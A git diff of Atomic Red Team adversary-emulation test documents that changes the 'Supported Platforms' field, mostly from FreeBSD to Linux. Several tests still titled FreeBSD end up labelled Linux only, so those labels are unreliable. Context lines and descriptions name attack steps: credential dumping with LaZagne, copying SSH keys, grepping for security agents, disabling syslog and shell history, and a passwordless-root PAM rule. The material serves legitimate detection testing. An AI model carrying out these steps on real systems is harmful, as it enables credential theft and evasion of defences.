b/atomics/T1497.001/T1497.001.md @@ -59,7 +59,7 @@ if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|V Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** e129d73b-3e03-4ae9-bf1e-67fc8921e0fd diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 2000944acc..a9677d0b6a 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -179,7 +179,7 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat| Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** fa96c21c-5fd6-4428-aa28-51a2fbecdbdc 
diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 4ffb278f79..1e03f270e5 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -104,7 +104,7 @@ shutdown /r /t #{timeout} ## Atomic Test #3 - Restart System via `shutdown` - FreeBSD/macOS/Linux This test restarts a FreeBSD/macOS/Linux system. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb @@ -137,7 +137,7 @@ shutdown -r #{timeout} ## Atomic Test #4 - Shutdown System via `shutdown` - FreeBSD/macOS/Linux This test shuts down a FreeBSD/macOS/Linux system using a halt. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de @@ -170,7 +170,7 @@ shutdown -h #{timeout} ## Atomic Test #5 - Restart System via `reboot` - FreeBSD/macOS/Linux This test restarts a FreeBSD/macOS/Linux system via `reboot`. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027 @@ -198,7 +198,7 @@ reboot ## Atomic Test #6 - Shutdown System via `halt` - FreeBSD/Linux This test shuts down a FreeBSD/Linux system using `halt`. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd @@ -226,7 +226,7 @@ halt -p ## Atomic Test #7 - Reboot System via `halt` - FreeBSD This test restarts a FreeBSD system using `halt`. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 7b1cee42-320f-4890-b056-d65c8b884ba5 @@ -282,7 +282,7 @@ halt --reboot ## Atomic Test #9 - Shutdown System via `poweroff` - FreeBSD/Linux This test shuts down a FreeBSD/Linux system using `poweroff`. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa 
@@ -310,7 +310,7 @@ poweroff ## Atomic Test #10 - Reboot System via `poweroff` - FreeBSD This test restarts a FreeBSD system using `poweroff`. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 5a282e50-86ff-438d-8cef-8ae01c9e62e1 diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 003788cfa1..c5b83f5ca0 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -91,7 +91,7 @@ systemctl daemon-reload ## Atomic Test #2 - Create SysV Service This test creates a SysV service unit file and enables it as a service. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 760fe8d2-79d9-494f-905e-a239a3df86f6 diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index c41cc67ae9..429f16b50d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -104,7 +104,7 @@ mv /tmp/T1546.004 ~/.bashrc ## Atomic Test #3 - Add command to .shrc Adds a command to the .shrc file of the current user -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 41502021-591a-4649-8b6e-83c9192aff53 @@ -142,7 +142,7 @@ mv /tmp/T1546.004 ~/.shrc ## Atomic Test #4 - Append to the system shell profile An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time "any" user logs in. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 694b3cc8-6a78-4d35-9e74-0123d009e94b @@ -179,7 +179,7 @@ sed -i "s/# Atomic Red Team was here! T1546.004//" /etc/profile ## Atomic Test #5 - Append commands user shell profile An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the "user" logs in. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 
diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index bc9d7f2f7c..5908cf1f35 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -54,7 +54,7 @@ rm -f /tmp/art-fish.txt Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** be1a5d70-6865-44aa-ab50-42244c9fd16f @@ -132,7 +132,7 @@ rm -f /tmp/art-fish.txt Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** ade10242-1eac-43df-8412-be0d4c704ada diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index df89ae35bf..1b8725b0db 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -79,7 +79,7 @@ sudo rm /tmp/hello.c ## Atomic Test #2 - Make and modify binary from C source (freebsd) Make, change owner, and change file attributes on a C source code file -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** dd580455-d84b-481b-b8b0-ac96f3b1dc4c @@ -161,7 +161,7 @@ sudo rm #{file_to_setuid} ## Atomic Test #4 - Set a SetUID flag on file (freebsd) This test sets the SetUID flag on a file in FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 9be9b827-ff47-4e1b-bef8-217db6fb7283 @@ -239,7 +239,7 @@ sudo rm #{file_to_setuid} ## Atomic Test #6 - Set a SetGID flag on file (freebsd) This test sets the SetGID flag on a file in FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 1f73af33-62a8-4bf1-bd10-3bea931f2c0d 
@@ -359,7 +359,7 @@ rm #{file_to_setcap} ## Atomic Test #9 - Do reconnaissance for files that have the setuid bit set This test simulates a command that can be run to enumerate files that have the setuid bit set
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 8e36da01-cd29-45fd-be72-8a0fcaad4481
@@ -387,7 +387,7 @@ find /usr/bin -perm -4000 ## Atomic Test #10 - Do reconnaissance for files that have the setgid bit set This test simulates a command that can be run to enumerate files that have the setgid bit set
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 3fb46e17-f337-4c14-9f9a-a471946533e2
diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md
index 4cee7af8ca..7dd6d38e96 100644
--- a/atomics/T1548.003/T1548.003.md
+++ b/atomics/T1548.003/T1548.003.md
@@ -60,7 +60,7 @@ sudo vim /etc/sudoers ## Atomic Test #2 - Sudo usage (freebsd) Common Sudo enumeration methods.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 2bf9a018-4664-438a-b435-cc6f8c6f71b1
@@ -131,7 +131,7 @@ sudo visudo -c -f /etc/sudoers ## Atomic Test #4 - Unlimited sudo cache timeout (freebsd) Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** a83ad6e8-6f24-4d7f-8f44-75f8ab742991
@@ -201,7 +201,7 @@ sudo visudo -c -f /etc/sudoers ## Atomic Test #6 - Disable tty_tickets for sudo caching (freebsd) Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md
index 4d9ece4483..ab8ce7667a 100644
--- a/atomics/T1552.001/T1552.001.md
+++ b/atomics/T1552.001/T1552.001.md
@@ -38,7 +38,7 @@ In cloud and/or containerized environments, authenticated user and service accou ## Atomic Test #1 - Find AWS credentials Find local AWS credentials from file, defaults to using / as the look path.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** macOS, Linux
 **auto_generated_guid:** 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
@@ -99,7 +99,7 @@ python2 laZagne.py all ## Atomic Test #3 - Extract passwords with grep Extracting credentials from files
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4
@@ -192,7 +192,7 @@ type C:\Windows\Panther\Unattend\unattend.xml ## Atomic Test #6 - Find and Access Github Credentials This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803
diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md
index 9fdb872eab..5bb0dcc97b 100644
--- a/atomics/T1552.003/T1552.003.md
+++ b/atomics/T1552.003/T1552.003.md
@@ -49,7 +49,7 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} ## Atomic Test #2 - Search Through sh History Search through sh history for specifice commands we want to capture
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** d87d3b94-05b4-40f2-a80f-99864ffa6803
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index 241f8914f3..32415d148c 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -75,7 +75,7 @@ dir c:\ /b /s .key | findstr /e .key ## Atomic Test #2 - Discover Private SSH Keys Discover private SSH keys on a FreeBSD, macOS or Linux system.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878
@@ -154,7 +154,7 @@ rm -rf #{output_folder} ## Atomic Test #4 - Copy Private SSH Keys with CP (freebsd) Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 12e4a260-a7fd-4ed8-bf18-1a28c1395775
@@ -245,7 +245,7 @@ rm -rf #{output_folder} ## Atomic Test #6 - Copy Private SSH Keys with rsync (freebsd) Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 922b1080-0b95-42b0-9585-b9a5ea0af044
@@ -336,7 +336,7 @@ rm -rf #{output_folder} ## Atomic Test #8 - Copy the users GnuPG directory with rsync (freebsd) Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** b05ac39b-515f-48e9-88e9-2f141b5bcad0
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md
index 5ac53b6559..462f52e5e0 100644
--- a/atomics/T1553.004/T1553.004.md
+++ b/atomics/T1553.004/T1553.004.md
@@ -74,7 +74,7 @@ update-ca-trust ## Atomic Test #2 - Install root CA on FreeBSD Creates a root CA with openssl
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** f4568003-1438-44ab-a234-b3252ea7e7a3
diff --git a/atomics/T1556.003/T1556.003.md b/atomics/T1556.003/T1556.003.md
index 68aec219e8..04cf236981 100644
--- a/atomics/T1556.003/T1556.003.md
+++ b/atomics/T1556.003/T1556.003.md
@@ -63,7 +63,7 @@ Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** b17eacac-282d-4ca8-a240-46602cf863e3
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index 529e832962..365a35ba1d 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -308,7 +308,7 @@ echo Please set input_files argument to include files that exist ## Atomic Test #6 - Data Compressed - nix - gzip Single File An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
@@ -346,7 +346,7 @@ rm -f #{input_file}.gz ## Atomic Test #7 - Data Compressed - nix - tar Folder or File An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a
@@ -396,7 +396,7 @@ mkdir -p #{input_file_folder} && touch #{input_file_folder}/file1 ## Atomic Test #8 - Data Encrypted with zip and gpg symmetric Encrypt data for exiltration
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f
diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md
index b3c6d38641..d51cbe97c4 100644
--- a/atomics/T1560.002/T1560.002.md
+++ b/atomics/T1560.002/T1560.002.md
@@ -20,7 +20,7 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and ## Atomic Test #1 - Compressing data using GZip in Python (FreeBSD/Linux) Uses GZip from Python to compress files
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8
@@ -71,7 +71,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #2 - Compressing data using bz2 in Python (FreeBSD/Linux) Uses bz2 from Python to compress files
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d
@@ -122,7 +122,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #3 - Compressing data using zipfile in Python (FreeBSD/Linux) Uses zipfile from Python to compress files
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0
@@ -173,7 +173,7 @@ echo "please install python to run this test"; exit 1 ## Atomic Test #4 - Compressing data using tarfile in Python (FreeBSD/Linux) Uses tarfile from Python to compress files
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 71c309bb74..1cf299d8a2 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -166,7 +166,7 @@ sudo #{package_installer} ## Atomic Test #2 - Disable syslog (freebsd) Disables syslog collection
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** db9de996-441e-4ae0-947b-61b6871e2fdf
@@ -1763,7 +1763,7 @@ echo 3> /proc/sys/vm/drop_caches disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** e74e4c63-6fde-4ad2-9ee8-21c3a1733114
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index c13a471ed8..255a8b243a 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -72,7 +72,7 @@ export HISTCONTROL=ignoreboth ## Atomic Test #2 - Disable history collection (freebsd) Disables history collection in shells
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** cada55b4-8251-4c60-819e-8ec1b33c9306
@@ -262,7 +262,7 @@ An Adversary may set the sh history files size environment variable (HISTSIZE) t Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 386d3850-2ce7-4508-b56b-c0558922c814
@@ -337,7 +337,7 @@ An Adversary may clear, unset or redirect the history environment variable HISTF Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** f7308845-6da8-468e-99f2-4271f2f5bb67
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index f34f892bd9..7b148c4874 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -312,7 +312,7 @@ echo "" ## Atomic Test #8 - Stop/Start Packet Filter Stop the Packet Filter if installed.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7
@@ -500,7 +500,7 @@ echo "" ## Atomic Test #12 - Add and delete Packet Filter rules Add and delete a rule on the Packet Filter (PF) if installed and enabled.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 8b23cae1-66c1-41c5-b79d-e095b6098b5b
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index 7fe62ba9ef..16669025d9 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -85,7 +85,7 @@ sed -i '$ d' /etc/#{libaudit_config_file_name} ## Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host Emulates modification of auditd configuration files
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** cedaf7e7-28ee-42ab-ba13-456abd35d1bd
@@ -177,7 +177,7 @@ fi ## Atomic Test #4 - Logging Configuration Changes on FreeBSD Host Emulates modification of syslog configuration.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index ff7901b5e6..163dc624bf 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -36,7 +36,7 @@ Adversaries can use this to their advantage to hide files and folders anywhere o ## Atomic Test #1 - Create a hidden file in a hidden directory Creates a hidden file inside a hidden directory
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md
index c89137e316..bb276603cd 100644
--- a/atomics/T1571/T1571.md
+++ b/atomics/T1571/T1571.md
@@ -51,7 +51,7 @@ Test-NetConnection -ComputerName #{domain} -port #{port} ## Atomic Test #2 - Testing usage of uncommonly used port Testing uncommonly used port utilizing telnet.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767
diff --git a/atomics/T1614.001/T1614.001.md b/atomics/T1614.001/T1614.001.md
index b9215bb60d..c4b136a4b6 100644
--- a/atomics/T1614.001/T1614.001.md
+++ b/atomics/T1614.001/T1614.001.md
@@ -91,7 +91,7 @@ Identify System language with the `locale` command. Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 837d609b-845e-4519-90ce-edc3b4b0e138
@@ -203,7 +203,7 @@ Note: `env` and `printenv` will usually provide the same results. `set` is also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a